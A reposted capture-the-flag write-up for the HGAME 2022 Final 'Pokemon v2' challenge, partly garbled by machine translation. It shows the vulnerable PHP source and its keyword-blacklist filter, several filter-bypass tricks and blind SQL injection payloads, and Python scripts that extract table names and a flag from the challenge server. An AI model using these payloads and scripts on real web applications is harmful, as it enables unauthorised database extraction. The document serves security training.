当前位置:网站首页>HGAME 2022 Final Pokemon v2 writeup
HGAME 2022 Final Pokemon v2 writeup
2022-08-10 23:45:00 【ek1ng】
Hgame final Pokemon v2 writeup
题目概述
一道sqlBlind topic,No direct echo andwaf比较多,finalI didn't make it at the time, and now I'll make up a supplementary question
参考: http://dhycnhdu.com/index.php/archives/5/https://blog.51cto.com/u_15400016/4287240
How to bypass filtering
The title is given the source code,根据源码的wafLet's talk about how to bypass it firstwaf
<?php
$server = $_ENV['MYSQL_ADDR'];
$username = $_ENV['MYSQL_USER'];
$password = $_ENV['MYSQL_PASSWORD'];
$database = $_ENV['DATABASE'];
$db = new mysqli($server, $username, $password, $database);
if ($db->connect_error) {
die('The 鏁 version is 馁 鐴 tart and 鎺鎺ュけ璐ワ紒');
}
function waf($code) {
$blacklist = ['substr', 'mid', '=', 'like', '#', '\'', '"', '!','extract', 'update', '\^', '\$','union', '\bor\b', 'and', ' ', '\+', '-'];
foreach($blacklist as $b) {
if (preg_match('/'.$b.'/i', $code)) {
return true;
}
}
return false;
}
function getStatusMessage($code) {
global $db;
if (waf($code)) {
return -1;
}
$sql = 'SELECT code,msg FROM errors WHERE code='.$code;
return $db->query($sql);
}
sqldirectly in the statementcodeVariables are concatenated insql语句,导致sql注入的发生.
unionThe filtering results in the inability to use a union query,Joint query is to directly bring out the query results,Only blinds can be used here,下面是对waffilter some bypass measures
substr -> right(left(xxx,1),1)
空格 -> /**/
= -> in() 或者 >
and -> %26%26
字符串过滤 -> 16进制编码
Subqueries require outer parentheses
注入点的判断
首先是注入点,在这个error界面的code变量存在sql注入
字段数
使用order byJudge the number of returned fields
/error.php?code=404/**/order/**/by/**/3
回显failed to query database
/error.php?code=404/**/order/**/by/**/2
回显pokemon not found
说明字段数为2
数据库长度
/error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1)
回显pokemon not found
/error.php?code=404/**/%26%26/**/if(length(database())>6,sleep(1),1)
echo is empty
说明数据库长度为7
数据库名
原payload:/error.php?code=404 and ascii(substr(database(),1,1)>112
绕waf后如下
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112
echo is empty
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>111
回显pokemon not found
Description The first character of the database field isp
Then we need to write onepython脚本,Manual injection is not a thing,写个pythonIt is faster to inject scripts with dichotomy
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 8):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left(database(),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404Indicates that the expression holds,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# No echo indicates that the expression does not hold,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到数据库名称pokemon
表名
原payload:?code=404 and (ascii(substr((select table_name from information_schema.tables where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404Indicates that the expression holds,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# No echo indicates that the expression does not hold,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到表名errors,seeeeeeecret,But I use it when bursting the data columntable_schema = ‘pokemon’So this table name is not used,Also there is something wrong with this script,Because I didn't judge the length,So the length of the burst is not sure,But usually there won't be repeated characters at the end
列名
原payload:?code=404 and (ascii(substr((select column_name from information_schema.columns where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404Indicates that the expression holds,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# No echo indicates that the expression does not hold,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到列名id,code,msg,flag
值
原payload:?code=404 and (ascii(substr((select flag from seeeeeeecret limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/flag/**/from/**/seeeeeeecret/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404Indicates that the expression holds,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# No echo indicates that the expression does not hold,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
hgame{96mz5v3c9hnj49t7xqj76et6xw4dpczy}
边栏推荐
- Parse method's parameter list (including parameter names)
- 鲜花线上销售管理系统的设计与实现
- 李宏毅机器学习-- Backpropagation
- HGAME 2022 复盘 writeup
- Doris建表注意事项,实时数仓的同学记得收藏
- ROS Experimental Notes - Install QPEP and Intel-MKL
- 定时器,同步API和异步API,文件系统模块,文件流
- 互联网中不可缺失的网络优化:“App与Server的交互依赖于网络”
- 大厂社招:Android 高级工程师的面试题,你知道多少?
- The Missing Semester of Your CS Education
猜你喜欢
ROS Experimental Notes - Install QPEP and Intel-MKL
工作记录:DB2查询数据,当字段为空时,赋值
小程序平台工具如何选择和使用?
[C language] Detailed explanation of data storage
CSDN21天学习挑战赛之折半查找
[C language] First understanding of pointers
【C语言】C语言程序设计:动态通讯录(顺序表实现)
App基础优化三部曲:启动原理&黑白屏优化&启动时间优化
互联网中不可缺失的网络优化:“App与Server的交互依赖于网络”
Parse method's parameter list (including parameter names)
随机推荐
使用PageHelper自定义PageInfo进行分页+模糊查询
如何判断一个数为多少进制?
ROS实验笔记之——安装QPEP以及Intel-MKL
Microsoft: Into Focus with Scott Guthrie Scott Hanselman Rajesh Jha and Kevin Scott | KEY11
Promote the high-quality development of denim clothing
App 启动速度优化系列:如何用一个placeholderUI来做初始化工作
u盘数据不小心删除怎么恢复,u盘数据删除如何恢复
宝塔实测-搭建PHP在线模拟考试系统
CW614N铜棒CuZn39Pb3对应牌号
How to determine how many bases a number is?
Multilingual Translation - Multilingual Translation Software Free
细谈APP开发焦点问题:AMS 系统时间调节原理
HGAME 2022 Final writeup
SQL注入基础---order by \ limit \ 宽字节注入
promise详解
sklearn.datasets.make_circles
14. Thymeleaf
Kioptrix Level 1 靶机wp
深度学习 Transformer架构解析
阿里P7晒出1月工资单:狠补了这个,真香...